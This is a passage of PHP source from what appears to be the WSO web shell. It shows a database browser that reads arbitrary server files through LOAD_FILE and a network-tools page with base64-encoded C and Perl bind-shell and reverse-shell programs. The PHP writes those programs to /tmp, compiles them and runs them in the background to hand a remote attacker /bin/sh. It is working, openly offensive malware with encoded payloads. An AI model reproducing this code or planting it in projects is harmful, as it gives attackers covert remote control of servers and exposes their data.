1383 foreach($item as $key => $value) {
1384 if($value == null)
1385 echo '<td><i>null</i></td>';
1386 else
1387 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1388 }
1389 echo '</tr>';
1390 }
1391 echo '</table>';
1392 } else {
1393 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1394 }
1395 }
1396 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1397 echo "</td></tr>";
1398 }
1399 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1400 if(@$_POST['p1'] == 'loadfile') {
1401 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1402 $file = $db->fetch();
1403 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1404 }
1405 }
1406 echo '</div>';
1407 printFooter();
1408}
1409function actionNetwork() {
1410 printHeader();
1411 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1412 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1413 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1414 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1415 ?>
1416 <h1>Network tools</h1><div class=content>
1417 <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1418 <span>Bind port to /bin/sh</span><br/>
1419 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
1420 </form>
1421 <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1422 <span>Back-connect to</span><br/>
1423 Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
1424 </form><br>
1425 <?php
1426 if(isset($_POST['p1'])) {
1427 function cf($f,$t) {
1428 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1429 if($w) {
1430 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1431 @fclose($w);
1432 }
1433 }
1434 if($_POST['p1'] == 'bpc') {
1435 cf("/tmp/bp.c",$bind_port_c);
1436 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1437 @unlink("/tmp/bp.c");
1438 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1439 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1440 }
1441 if($_POST['p1'] == 'bpp') {
1442 cf("/tmp/bp.pl",$bind_port_p);
1443 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1444 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1445 }
1446 if($_POST['p1'] == 'bcc') {
1447 cf("/tmp/bc.c",$back_connect_c);
1448 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1449 @unlink("/tmp/bc.c");
1450 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1451 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1452 }
1453 if($_POST['p1'] == 'bcp') {
1454 cf("/tmp/bc.pl",$back_connect_p);
1455 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1456 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1457 }
1458 }
1459 echo '</div>';
1460 printFooter();
1461}
1462if( empty($_POST['a']) )
1463 if(isset($default_action) && function_exists('action' . $default_action))
1464 $_POST['a'] = $default_action;
1465 else
1466 $_POST['a'] = 'SecInfo';
1467if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1468 call_user_func('action' . $_POST['a']);
1469?>